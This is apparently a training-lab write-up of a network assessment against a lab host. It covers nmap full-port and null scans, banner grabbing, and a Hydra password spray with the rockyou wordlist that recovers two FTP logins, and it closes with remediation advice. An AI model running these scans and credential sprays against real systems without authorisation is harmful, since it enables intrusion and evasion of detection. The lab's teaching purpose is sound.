Case file

Full-port nmap, FTP spray, and null-scan evasion

Intermediate network assessment drill: full TCP inventory, banner harvesting, Hydra against vsftpd on a non-standard port, and null-scan IDS evasion — methodology without a full boot-to-root.

Intermediate22 minNetwork · Nmap · FTP · Hydra
  • A methodology lab focused on accurate port discovery, service banners, credential spraying on FTP, and stealth scan types — not privilege escalation.

  • nmap -sV -p- -A enumerated SSH, lighttpd, Samba, Express on 8080, and vsftpd on 10021.

  • Hydra against vsftpd:10021 recovered eddie:jordan and quinn:andrea. Quinn’s session held an operational artifact.

  • A TCP null scan (-sN) exercised IDS evasion technique against the same host inventory.

01

Engagement summary

A methodology lab focused on accurate port discovery, service banners, credential spraying on FTP, and stealth scan types — not privilege escalation.

Against 10.201.27.157 we ran a full TCP version scan, recovered SSH and HTTP banner artifacts, identified six open ports including vsftpd on 10021 and a Node service on 8080, sprayed FTP for eddie and quinn, and demonstrated a null scan for IDS evasion. This case documents operator technique for network security assessments where the deliverable is coverage and credential risk, not root.

Business impact

Non-standard FTP ports and weak passwords still yield data exposure. Banner leakage and incomplete port coverage leave blind spots in both offense and defense. Require full-port inventories in scopes, rotate FTP credentials, and alert on null/FIN/Xmas scans.

02

Full-port service discovery

nmap -sV -p- -A enumerated SSH, lighttpd, Samba, Express on 8080, and vsftpd on 10021.

Full TCP version scan

OPERATOR · NMAP

savvy@lab:~$ nmap -sV -p- -A 10.201.27.157

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2p1 Ubuntu

80/tcp open http lighttpd

139/tcp open netbios-ssn Samba smbd 4.6.2

445/tcp open netbios-ssn Samba smbd 4.6.2

8080/tcp open http Node.js Express framework

10021/tcp open ftp vsftpd 3.0.5

OPERATOR · BANNERS

savvy@lab:~$ nc 10.201.27.157 22

SSH-2.0-OpenSSH_8.2p1 Ubuntu ...

savvy@lab:~$ curl -I http://10.201.27.157

Server: lighttpd

03

FTP credential spray

Hydra against vsftpd:10021 recovered eddie:jordan and quinn:andrea. Quinn’s session held an operational artifact.

OPERATOR · HYDRA

savvy@lab:~$ hydra -L user.txt -P /usr/share/wordlists/rockyou.txt ftp://10.201.27.157:10021

[10021][ftp] host: 10.201.27.157 login: eddie password: jordan

[10021][ftp] host: 10.201.27.157 login: quinn password: andrea

savvy@lab:~$ ftp 10.201.27.157 10021

Name: quinn

ftp> get ftp_flag.txt

ftp> bye

04

Null-scan evasion check

A TCP null scan (-sN) exercised IDS evasion technique against the same host inventory.

OPERATOR · NULL SCAN

savvy@lab:~$ nmap -sN 10.201.27.157

# null scan: no TCP flags set — useful for firewall/IDS behavior checks

Nmap done: 1 IP address (1 host up) scanned

Remediation

Enforce strong FTP passwords and MFA where possible; close unused high ports; strip sensitive data from banners; tune IDS for unusual TCP flag combinations including null, FIN, and Xmas scans.